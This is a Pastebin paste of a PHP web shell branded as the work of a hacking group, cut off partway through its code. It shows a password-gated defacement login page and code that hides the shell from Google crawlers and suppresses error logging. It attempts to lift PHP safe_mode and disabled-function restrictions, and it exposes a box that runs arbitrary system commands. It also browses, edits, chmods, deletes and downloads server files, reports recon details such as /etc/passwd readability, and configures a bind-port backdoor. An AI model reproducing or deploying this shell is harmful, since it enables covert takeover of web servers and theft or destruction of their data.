EddieKidiw

Shell Azzatssins's Cyberserker's Decoder By Eddie Kidiw

Nov 1st, 2015
431
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 358.47 KB | None | 0 0
  1. <?php
  2. @session_start();
  3. @define('SELF_PATH', __FILE__);
  4. $auth_pass = "4d9234336ed8b445f892fc40601d2fad";
  5. $cookie_hour_expire = 24;
  6.  
  7. if(strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  8. header('HTTP/1.0 404 Not Found');
  9. exit;
  10. }
  11. function printLogin() { ?>
  12.  
  13. <meta content=HACKED-BY-AZZATSSINS-CYBERSERKERS-OF-PSYCHOPATH name=description>
  14. <title>AZZATSSIN'S CYBERSERKER'S</title>
  15. <center>
  16. <h1><i>~# KILLED BY AZZATSSIN'S #~</i></h1>
  17. <br /><table><border><nobr><img src=https://scontent-iad3-1.xx.fbcdn.net/hphotos-xfa1/t31.0-8/11741021_1583605078555010_3385696737335881837_o.jpg><br /><br /><font color=violet>~</font><font color=lime>*</font><font color=red>What I want is not peace, but the advantages and beliefs</font><font color=lime>*</font><font color=violet>~</font></center><br>
  18. <form method=post>
  19. <address><input type=password name=x><input type=submit value=''></center></address>
  20. </form></body></html>
  21. <?php
  22. exit;
  23. }
  24. $cookie_value = md5($_SERVER['HTTP_HOST']."dm".$auth_pass);
  25. if(isset($_POST['x'])){
  26. if(md5($_POST['x']) != $auth_pass){
  27. printLogin();
  28. }else{
  29. setcookie("dm", $cookie_value, time()+(60*(60*$cookie_hour_expire)));
  30. }
  31. }
  32. elseif(isset($_COOKIE['dm'])){
  33. if($_COOKIE['dm'] != $cookie_value){
  34. printLogin();
  35. }
  36. }elseif(!isset($_COOKIE['dm'])){
  37. printLogin();
  38. }
  39. if(isset($_POST['logout'])){
  40. setcookie("dm", "", time()-(60*(60*60*360000)));
  41. $page = $host='http://'.$_SERVER['SERVER_NAME'].'/'.$_SERVER['PHP_SELF'];
  42. echo '<center><span class="b1"> Please Wait ...</scan></center>';
  43. ?>
  44. <script>window.location.href = '<?php print $page; ?>';</script>
  45. <?php exit(0);
  46. }
  47.  
  48.  
  49. @set_time_limit(0);
  50. @error_reporting(0);
  51. @ini_set('log_errors',0);
  52. @ini_set('error_log',NULL);
  53. @ini_restore("safe_mode");
  54. @ignore_user_abort(FALSE);
  55. @ini_restore("open_basedir");
  56. @set_magic_quotes_runtime(0);
  57. @ini_restore("allow_url_fopen");
  58. @ini_set('max_execution_time',0);
  59. @ini_restore("disable_functions");
  60. @ini_restore("safe_mode_exec_dir");
  61. @ini_restore("safe_mode_include_dir");
  62. @ini_set('zlib.output_compression','Off');
  63. date_default_timezone_set('Etc/GMT');
  64.  
  65. if(get_magic_quotes_gpc()){
  66. function stripslashes_array($array)
  67. { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); }
  68. $_POST = stripslashes_array($_POST);
  69. }
  70.  
  71. $quotes = get_magic_quotes_gpc();
  72. if ($quotes == "1" or $quotes == "on")
  73. { $quot = "<font style='color:yellow'>ON</font>";}
  74. else
  75. { $quot = "<font style='color:#444444'>OFF</font>"; }
  76.  
  77. $disablefunc = @ini_get("disable_functions");
  78. function showdisablefunctions() {
  79. if ($disablefunc=@ini_get("disable_functions"))
  80. { return "<span style='color:yellow'>".$disablefunc."</span>"; }
  81. else
  82. { return "<span style='color:#444444'>NONE</span>"; }
  83. }
  84.  
  85. function ex($cfe) {
  86. $res = '';
  87. if (!empty($cfe)) {
  88. if(function_exists('exec')) {
  89. @exec($cfe,$res);
  90. $res = join("\n",$res);
  91. }
  92. elseif(function_exists('shell_exec')) {
  93. $res = @shell_exec($cfe);
  94. }
  95. elseif(function_exists('system')) {
  96. @ob_start();
  97. @system($cfe);
  98. $res = @ob_get_contents();
  99. @ob_end_clean();
  100. }
  101. elseif(function_exists('passthru')) {
  102. @ob_start();
  103. @passthru($cfe);
  104. $res = @ob_get_contents();
  105. @ob_end_clean();
  106. }
  107. elseif(@is_resource($f = @popen($cfe,"r"))) {
  108. $res = "";
  109. while(!@feof($f)) { $res .= @fread($f,1024); }
  110. @pclose($f);
  111. } else { $res = "Ex() Disabled!"; }
  112. }
  113. return $res;
  114. }
  115.  
  116. function delete_option($file){
  117. if(!$win){
  118. @exe("rm -rf ".$file);
  119. if(file_exists($file) && is_file($file)){unlink($file);}
  120. elseif(file_exists($file) && is_dir($file)){rmdir($file);}
  121. }
  122. elseif($win){
  123. if(is_dir($file)){
  124. @exe("rd /s /q ".$file);
  125. if(file_exists($file)){rmdir($file);}
  126. }
  127. else {
  128. @exe("del /q /f ".$file);
  129. exe("rd /s /q ".$file);
  130. if(file_exists($file)){
  131. unlink($file);
  132. }
  133. }
  134. }
  135. }
  136.  
  137. if(isset($_POST['rename'])){
  138. $old = $_POST['oldname'];
  139. $new = $_POST['newname'];
  140. @rename($pwd.$old,$pwd.$new);
  141. $file = $pwd.$new;
  142. }
  143. if(isset($_POST['chmod'])){
  144. $name = $_POST['name'];
  145. $value = $_POST['newvalue'];
  146. if (strlen($value)==3){
  147. $value = 0 . "" . $value;
  148. }
  149. @chmod($pwd.$name,octdec($value));
  150. $file = $pwd.$name;
  151. }
  152. if(isset($_POST['chmod_folder'])){
  153. $name = $_POST['name'];
  154. $value = $_POST['newvalue'];
  155. if (strlen($value)==3){
  156. $value = 0 . "" . $value;
  157. }
  158. @chmod($pwd.$name,octdec($value));
  159. $file = $pwd.$name;
  160. }
  161.  
  162. function showstat($stat) {
  163. if ($stat=="on")
  164. { return "<b><font style='color:yellow'>ON</font></b>"; }
  165. else
  166. { return "<b><font style='color:#444444'>OFF</font></b>"; }
  167. }
  168. function testperl() {
  169. if (ex('perl -h'))
  170. { return showstat("on"); }
  171. else
  172. { return showstat("off"); }
  173. }
  174. function testfetch() {
  175. if(ex('fetch --help'))
  176. { return showstat("on"); }
  177. else
  178. { return showstat("off"); }
  179. }
  180. function testwget() {
  181. if (ex('wget --help'))
  182. { return showstat("on"); }
  183. else
  184. { return showstat("off"); }
  185. }
  186. function testoracle() {
  187. if (function_exists('ocilogon'))
  188. { return showstat("on"); }
  189. else
  190. { return showstat("off"); }
  191. }
  192. function testpostgresql() {
  193. if (function_exists('pg_connect'))
  194. { return showstat("on"); }
  195. else
  196. { return showstat("off"); }
  197. }
  198. function testmssql() {
  199. if (function_exists('mssql_connect'))
  200. { return showstat("on"); }
  201. else
  202. { return showstat("off"); }
  203. }
  204. function testcurl() {
  205. if (function_exists('curl_version'))
  206. { return showstat("on"); }
  207. else
  208. { return showstat("off"); }
  209. }
  210. function testmysql() {
  211. if (function_exists('mysql_connect'))
  212. { return showstat("on"); }
  213. else
  214. { return showstat("off"); }
  215. }
  216.  
  217.  
  218. if(isset($_GET['dl']) && ($_GET['dl'] != "")){
  219. $file = $_GET['dl'];
  220. $filez = @file_get_contents($file);
  221. header("Content-type: application/octet-stream");
  222. header("Content-length: ".strlen($filez));
  223. header("Content-disposition: attachment; filename=\"".basename($file)."\";");
  224. echo $filez;
  225. exit;
  226. }
  227.  
  228. elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
  229. $file = $_GET['dlgzip'];
  230. $filez = gzencode(@file_get_contents($file));
  231. header("Content-Type:application/x-gzip\n");
  232. header("Content-length: ".strlen($filez));
  233. header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
  234. echo $filez;
  235. exit;
  236. }
  237.  
  238.  
  239. if(isset($_GET['img'])){
  240. @ob_clean();
  241. $d = isset($_GET['img'])? $_GET['img']:"";
  242. $f = $_GET['img'];
  243. $inf = @getimagesize($d.$f);
  244. $ext = explode($f,".");
  245. $ext = $ext[count($ext)-1];
  246. @header("Content-type: ".$inf["mime"]);
  247. @header("Cache-control: public");
  248. @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  249. @header("Cache-control: max-age=".(60*60*24*7));
  250. @readfile($d.$f);
  251. die();
  252. }
  253.  
  254. $software = getenv("SERVER_SOFTWARE");
  255. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE;
  256. $system = @php_uname();
  257. if(strtolower(substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE;
  258. if(isset($_GET['dm'])){
  259. if(@is_dir($_GET['view'])){
  260. $pwd = $_GET['view'];
  261. @chdir($pwd);
  262. }
  263. else{
  264. $pwd = $_GET['dm'];
  265. @chdir($pwd);
  266. }
  267. }
  268. if(!$win){
  269. if(!$user = rapih(exe("whoami"))) $user = "";
  270. if(!$id = rapih(exe("id"))) $id = "";
  271. $prompt = $user." \$] ";
  272. $pwd = @getcwd().DIRECTORY_SEPARATOR;
  273. }
  274. else {
  275. $user = @get_current_user();
  276. $id = $user;
  277. $prompt = $user." &gt;";
  278. $pwd = realpath(".")."\\";
  279. $v = explode("\\",$d);
  280. $v = $v[0];
  281. foreach (range("A","Z") as $letter) {
  282. $bool = @is_dir($letter.":\\");
  283. if ($bool) {
  284. $letters .= "<a href=\"?dm=".$letter.":\\\"><span class=\"infodmx\">[ ";
  285. if ($letter.":" != $v)
  286. { $letters .= $letter; }
  287. else
  288. { $letters .= "<span style=\"color:#444444\"/>".$letter."</span>";}
  289. $letters .= " ]</span> </a>";
  290. }
  291. }
  292. }
  293. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE;
  294. $bytes = disk_free_space(".");
  295. $si_prefix = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
  296. $base = 1024;
  297. $class = min((int)log($bytes , $base) , count($si_prefix) - 1);
  298. $totalspace_bytes = disk_total_space(".");
  299. $totalspace_si_prefixs = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
  300. $totalspace_bases = 1024;
  301. $totalspace_class = min((int)log($totalspace_bytes , $totalspace_bases) , count($totalspace_si_prefixs) - 1);
  302. $totalspace_show = sprintf('%1.2f' , $totalspace_bytes / pow($totalspace_bases,$totalspace_class)) . ' ' . $totalspace_si_prefixs[$totalspace_class] . '';
  303. $freespace_show = sprintf('%1.2f' , $bytes / pow($base,$class)) . ' ' . $si_prefix[$class] . '';
  304. $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
  305. $my_ip = $_SERVER['REMOTE_ADDR'];
  306. $server_admin=$_SERVER['SERVER_ADMIN'];
  307. $gat = $_SERVER['GATEWAY_INTERFACE'];
  308. $pro = $_SERVER['SERVER_PROTOCOL'];
  309. $readdr = $_SERVER['REMOTE_ADDR'];
  310. $uagent = $_SERVER['HTTP_USER_AGENT'];
  311. $xforwarded = $_SERVER['HTTP_X_FORWARDED_FOR'];
  312. $signature = $_SERVER['SERVER_SIGNATURE'];
  313. $serport = $_SERVER['SERVER_PORT'];
  314. $remport = $_SERVER['REMOTE_PORT'];
  315. $bindport = "13123";
  316. $bindport_pass = "b374k";
  317. $etc_passwd=@is_readable("/etc/passwd")?"<b><span style=\"color:#444444\"/>ON</span></b>":"<b><span style=\"color:yellow\"/>DISABLE</span></b>";
  318. $pwds = explode(DIRECTORY_SEPARATOR,$pwd);
  319. $pwdurl = "";
  320. for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
  321. $pathz = "";
  322. for($j = 0 ; $j <= $i ; $j++)
  323. { $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; }
  324. $pwdurl .= "<a href=\"?dm=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
  325. }
  326.  
  327.  
  328. $buff .= "<nobr><b><span class=\"dminfox\">Software</span> : <span style=\"color:#444444\"/>" . $software . "</span></b></nobr><br/>";
  329. $buff .= "<nobr><b><span class=\"dminfox\">System</span> : <span style=\"color:#444444\"/>".$system."</span></b></nobr><br />";
  330. $buff .= "<nobr><b><span class=\"dminfox\">Webmaster</span> : "."<b><span style='color:#444444'>$server_admin</span></b>"." <b><span class=\"infodmx\">||</span></b> <span class=\"dminfox\">Date : <b><span style=\"color:#444444\"/>".date("d M Y H:i:s",time())."</b><br/>";
  331. if($id != "")
  332. $buff .= "<nobr><span class=\"dminfox\">User</span> : <b><span style=\"color:#444444\"/>" . $id . "</span></b><nobr><br />";
  333. $buff .= "<nobr><span class=\"dminfox\">Server IP</span> : <b><span style=\"color:#444444\"/>".$server_ip."</span> <span class=\"infodmx\">||</span></b> <span class=\"dminfox\">Server Port</span> : <b><span style=\"color:#444444\"/>".$serport."</span></b></nobr><br/>";
  334. $buff .= "<nobr><span class=\"dminfox\">Your IP</span> : <b><span style=\"color:#444444\"/>".$my_ip."</span>
  335. <span class=\"infodmx\">||</span></b> <span class=\"dminfox\">Real IP</span> : <b><span style=\"color:#444444\"/>".$xforwarded."</span> <span class=\"infodmx\">||</span></b> <span class=\"dminfox\">Remote Port</span> : <b><span style=\"color:#444444\"/>".$remport."</span> </b></nobr><br/>";
  336. $buff .= "<nobr><span class=\"dminfox\">Total HDD</span> : "."<b><span style='color:#444444'>$totalspace_show</span>"." <b><span class=\"infodmx\">||</span></b> "."<span class=\"depan\">Free HDD</span> : "."<b><span style='color:#444444'>$freespace_show</span>"."</b></nobr><br/>";
  337. $buff .= "<nobr><span class=\"dminfox\">PHP ver</span> : <b><span style='color:#444444'>".phpversion()."</span> <span class=\"infodmx\">||</span></b>
  338. <span class=\"dminfox\">Gateway</span> : <b><span style='color:#444444'>".$gat."</span> <span class=\"infodmx\">||</span></b> <span class=\"dminfox\">Protocol</span> : <b><span style='color:#444444'>".$pro."</span></b></nobr><br/>";
  339.  
  340. if($safemode)
  341. $buff .= "<nobr><span class=\"dminfox\">Safemode</span> : <b><span style=\"color:yellow\">ON</span> [ <a href='?dm=$pwd&amp;x=safemodeoff'>BYPASS</a> ]</b><br />";
  342. else $buff .= "<nobr><span class=\"dminfox\">Safemode</span> : <b><span style=\"color:#444444\">OFF</span> <span class=\"infodmx\">||</span></b> <span class=\"depan\">Magic Quotes</span> : <b><span style=\"color:#444444\"/>".$quot."</span> <span class=\"infodmx\">||</span></b> <span class=\"dminfox\">Read /etc/passwd</span> : "."<span style='color:#444444'>$etc_passwd</span>"."<br />";
  343. $buff .= "<nobr><span class=\"dminfox\">MySQL</span> : <b><span style=\"color:#444444\"/>".testmysql()." <span class=\"infodmx\">||</span></b>
  344. <span class=\"dminfox\">MSSQL :</span><b> <span style=\"color:#444444\"/>".testmssql()."</span> <span class=\"infodmx\">||</span></b>
  345. <span class=\"dminfox\">Oracle :</span><b> <span style=\"color:#444444\"/>".testoracle()."</span> <span class=\"infodmx\">||</span></b>
  346. <span class=\"dminfox\">PostgreSQL :</span><b> <span style=\"color:#444444\"/>".testpostgresql()."</span></b> </nobr><br/>";
  347. $buff .= "<nobr><span class=\"dminfox\">Curl</span> : <b><span style=\"color:#444444\"/>".testcurl()."</span> <span class=\"infodmx\">||</span></b>
  348. <span class=\"dminfox\">WGet</span> : <b><span style=\"color:#444444\"/>".testwget()."</span> <span class=\"infodmx\">||</span></b>
  349. <span class=\"dminfox\">Fetch</span> : <b><span style=\"color:#444444\"/>".testfetch()."</span> <span class=\"infodmx\">||</span></b>
  350. <span class=\"dminfox\">Perl</span> : <b><span style=\"color:#444444\"/>".testperl()."</span></b></nobr><br/>";
  351. $buff .= "<span class=\"dminfox\">Disabled Functions</span> : <span style=\"color:#444444\">".showdisablefunctions()."<br />";
  352. $buff .= $letters."<span class=\"dminfox\">Directory : ".$pwdurl."</span><br /><br />";
  353.  
  354. function rapih($text){
  355. return trim(str_replace("<br />","",$text));
  356. }
  357. function magicboom($text) {
  358. if(!get_magic_quotes_gpc())
  359. {
  360. return $text;
  361. }
  362. return stripslashes($text);
  363. }
  364.  
  365.  
  366. function showdir($pwd,$prompt){
  367. $fname = array();
  368. $dname = array();
  369. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  370. else $posix = FALSE;
  371. $user = "????:????";
  372. if($dh = opendir($pwd)){
  373. while($file = readdir($dh)){
  374. if(is_dir($file))
  375. { $dname[] = $file; }
  376. elseif(is_file($file))
  377. { $fname[] = $file; }
  378. }
  379. closedir($dh);
  380. }
  381. sort($fname);
  382. sort($dname);
  383. $path = @explode(DIRECTORY_SEPARATOR,$pwd);
  384. $tree = @sizeof($path);
  385. $parent = "";
  386.  
  387.  
  388. // Membuat 2 Form Input CMD n DIRectory Di Main Page //
  389. $buff = "<form action=\"?dm=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
  390. <table class=\"cmdbox\" style=\"width:50%;\">
  391.  
  392. <tr>
  393. <td><nobr><b>CMD</b></nobr></td>
  394. <td><!-- onMouseOver=\"this.focus();\" --><nobr><input id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:300px;\" value=\"\" />
  395. <input class=\"inputzbut\" type=\"submit\" value=\" >> \" name=\"submitcmd\" style=\"width:50px;\" />
  396. </nobr>
  397. </form>
  398. </td>
  399. </tr>
  400.  
  401. <tr>
  402. <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
  403. <input type=\"hidden\" name=\"dm\" value=\"".$pwd."\" />
  404. <td><nobr><b>DIR</b></nobr></td>
  405.  
  406. <td><nobr><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:300px;\" value=\"".$pwd."\" /> <input class=\"inputzbut\" type=\"submit\" value=\" >> \" name=\"submitcmd\" style=\"width:50px;\" /></nobr></form>
  407. </td>
  408. </tr>
  409. </table>
  410.  
  411. <p><table class=\"explore\"><tr>
  412. <th style=\"width:200px;\"><strong><span class='b3'>_NAME_</span></strong></th>
  413. <th style=\"width:70px;\"><strong><span class='b3'>_DIR / SIZE_</span></strong></th>
  414. <th style=\"width:70px;\"><strong><span class='b3'>_CHMOD_</span></strong></th>
  415. <th style=\"width:150px;\"><strong><span class='b3'>_OWNER : GROUP_</span></strong></th>
  416. <th style=\"width:140px;\"><strong><span class='b3'>_LAST ACCESS_</span></strong></th>
  417. <th style=\"width:150px;\"><strong><span class='b3'>_ACTION_</span></strong></th></tr>";
  418.  
  419. if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
  420. else $parent = $pwd;
  421. foreach($dname as $folder){
  422. if($folder == ".") {
  423. if(!$win && $posix){
  424. $name=@posix_getpwuid(@fileowner($folder));
  425. $group=@posix_getgrgid(@filegroup($folder));
  426. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; }
  427. else {
  428. $owner = $user;
  429. }
  430. $buff .= "<tr>
  431. <td><a href=\"?dm=".$pwd."\"><img src='data:image/png;base64,R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWSkrqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/jVwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs='>$folder</a></td>
  432. <td align=center>-</td>
  433. <td align=center>".substr(sprintf('%o', fileperms($pwd)), -4)."</td>
  434. <td align=center>".$owner."</td>
  435. <td align=center>".date("d-M-Y H:i",@fileatime($pwd))."</td>
  436. <td align=center><span id=\"titik1\">
  437. <a href=\"?dm=$pwd&amp;edit=".$pwd."new.php\">[ +FILE ]&nbsp;</a><span class=\"infodmx\">||</span><a href=\"javascript:tukar('titik1','titik1_form');\">&nbsp;[ +FOLDER ]</a></span>
  438. <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  439. <input type=\"hidden\" name=\"dm\" value=\"".$pwd."\" />
  440. <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"folder\" />
  441. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  442. </form>
  443. </td></tr>";
  444. }
  445.  
  446. elseif($folder == "..") {
  447. if(!$win && $posix){
  448. $name=@posix_getpwuid(@fileowner($folder));
  449. $group=@posix_getgrgid(@filegroup($folder));
  450. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  451. }
  452. else { $owner = $user; }
  453. $buff .= "<tr>
  454. <td><a href=\"?dm=".$parent."\"><img src='data:image/png;base64,R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqtWg0JADs='/>$folder</a></td>
  455. <td align=center>-</td>
  456. <td align=center>".substr(sprintf('%o', fileperms($parent)), -4)."</td>
  457. <td align=center>".$owner."</td>
  458. <td align=center>".date("d-M-Y H:i",@fileatime($parent))."</td>
  459. <td align=center><span id=\"titik2\"><a href=\"?dm=$pwd&amp;edit=".$parent."new.php\">[+FILE ] &nbsp;</a><span class=\"infodmx\">||</span><a href=\"javascript:tukar('titik2','titik2_form');\">&nbsp;[ +FOLDER ]</a></span>
  460. <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  461. <input type=\"hidden\" name=\"dm\" value=\"".$pwd."\" />
  462. <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"folder\" />
  463. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  464. </form>
  465. </td>
  466. </tr>";
  467. } else {
  468. if(!$win && $posix){
  469. $name=@posix_getpwuid(@fileowner($folder));
  470. $group=@posix_getgrgid(@filegroup($folder));
  471. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  472. }
  473. else { $owner = $user; }
  474. $buff .= "<tr>
  475. <td>
  476. <a id=\"".clearspace($folder)."_link\" href=\"?dm=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><img src='data:image/png;base64,
  477. R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///
  478. nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='/> $folder </a>
  479.  
  480. <form action=\"?dm=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  481. <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  482. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
  483. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  484. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
  485. </form>
  486. </td>
  487. <td align=center>FOLDER</td>
  488. <td align=center><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">
  489. ".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."</a>
  490. <form action=\"?dm=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  491. <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  492. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
  493. <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
  494. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></td>
  495. <td align=center>".$owner."</td>
  496. <td align=center>".date("d-M-Y H:i",@fileatime($folder))."</td>
  497. <td align=center><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">[ REN ]&nbsp;</a><span class=\"infodmx\">||</span><a href=\"?dm=$pwd&amp;fdelete=".$pwd.$folder."\">&nbsp;[ DEL ]</a>
  498. </td></tr>";
  499. }
  500. }
  501.  
  502. foreach($fname as $file){
  503. $full = $pwd.$file;
  504. if(!$win && $posix){
  505. $name=@posix_getpwuid(@fileowner($file));
  506. $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else {
  507. $owner = $user;
  508. }
  509. $buff .= "<tr>
  510. <td><a id=\"".clearspace($file)."_link\" href=\"?dm=$pwd&amp;view=$full\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAadEVYdFNvZnR3YXJlAFBhaW50Lk5FVCB2My41LjEwMPRyoQAAAXVJREFUOE+NkjtPwlAYhv0DLEZJSDQawQCTcYD/YWIkzqx0cHT1D7C4nMRFSdOWi4uzm9FFXcRBI3KxQGlLoYCAILyekhiRw6UneZKmeb8n79eepaW/43e5XFGfz0csvF4v8Xi2yfrGJllecRIa2xnLMo+OcDis6kYNulEfUdEMZD/KuH1IQ7y6RiQS0eZJAolkig6U/pHJy0i/vOPm/gnlikYl3ExJMJm6hFxWGQpFhUqyKJQqyNFGHMfptMnu5A5UkBrVZqkiLyt4zcrI5It4y8nY2w9ZkrVxSdBaoVozZ6LqtVGDu8dnHB2fgA4HGYHZaGE2TRj1BoqKhlNyxgriiSRan+2FmM0WYrzACiQq6HS7C2l3uhDjiSkC+vKr17OFNE0gSnH0+9+2sLLMRxRECYPBwBaCOEXACyKGw6EteEFiGgTOYzzsnguapSsExu+B4yB0qJYUlf5rcy5WxsrSYcfkdfavOp3RLbebzMPK0EH/7/APv59j7X+gJNIAAAAASUVORK5CYII%3D' /> $file</a><form action=\"?dm=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  511. <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  512. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
  513. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  514. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
  515. </form></td>
  516. <td align=center>".ukuran($full)."</td>
  517. <td align=center><a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".substr(sprintf('%o', fileperms($full)), -4)."</a><form action=\"?dm=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  518. <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  519. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
  520. <input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
  521. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" />
  522. </form></center></td>
  523. <td align=center>".$owner."</td>
  524. <td align=center>".date("d-M-Y H:i",@fileatime($full))."</td>
  525. <td align=center><a href=\"?dm=$pwd&amp;edit=$full\">[E]</a>
  526. <span class=\"infodmx\">||</span>
  527. <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">[R]</a>
  528. <span class=\"infodmx\">||</span>
  529. <a href=\"?dm=$pwd&amp;delete=$full\">[X]</a>
  530. <span class=\"infodmx\">||</span>
  531. <a href=\"?dm=$pwd&amp;dl=$full\">[D]</a>
  532. </td></tr>";
  533. }
  534. $buff .= "</table></p>";
  535. return $buff;
  536. }
  537.  
  538. // Fungsi Ukuran Besar Jenis File
  539. function ukuran($file){
  540. if($size = @filesize($file)){
  541. if($size <= 1024) {
  542. return "$size B";
  543. } else {
  544. if($size <= 1024*1024) {
  545. $size = @round($size / 1024,2);;
  546. return "$size KB";
  547. } else {
  548. $size = @round($size / 1024 / 1024,2);
  549. return "$size MB";
  550. }
  551. }
  552. }
  553. else return "???";
  554. }
  555.  
  556. function exe($cmd){
  557. if(function_exists('system')) {
  558. @ob_start();
  559. @system($cmd);
  560. $buff = @ob_get_contents();
  561. @ob_end_clean();
  562. return $buff;
  563. }
  564. elseif(function_exists('exec')) {
  565. @exec($cmd,$results);
  566. $buff = "";
  567. foreach($results as $result){
  568. $buff .= $result;
  569. }
  570. return $buff;
  571. }
  572. elseif(function_exists('passthru')) {
  573. @ob_start();
  574. @passthru($cmd);
  575. $buff = @ob_get_contents();
  576. @ob_end_clean();
  577. return $buff;
  578. }
  579. elseif(function_exists('shell_exec')){
  580. $buff = @shell_exec($cmd);
  581. return $buff;
  582. }
  583. }
  584.  
  585. // Fungsi Tulis NewFile //
  586. function tulis($file,$text){
  587. $textz = gzinflate(base64_decode($text));
  588. if($filez = @fopen($file,"w")) {
  589. @fputs($filez,$textz);
  590. @fclose($file);
  591. }
  592. }
  593.  
  594. // Fungsi Upload Dari Url //
  595. function ambil($link,$file) {
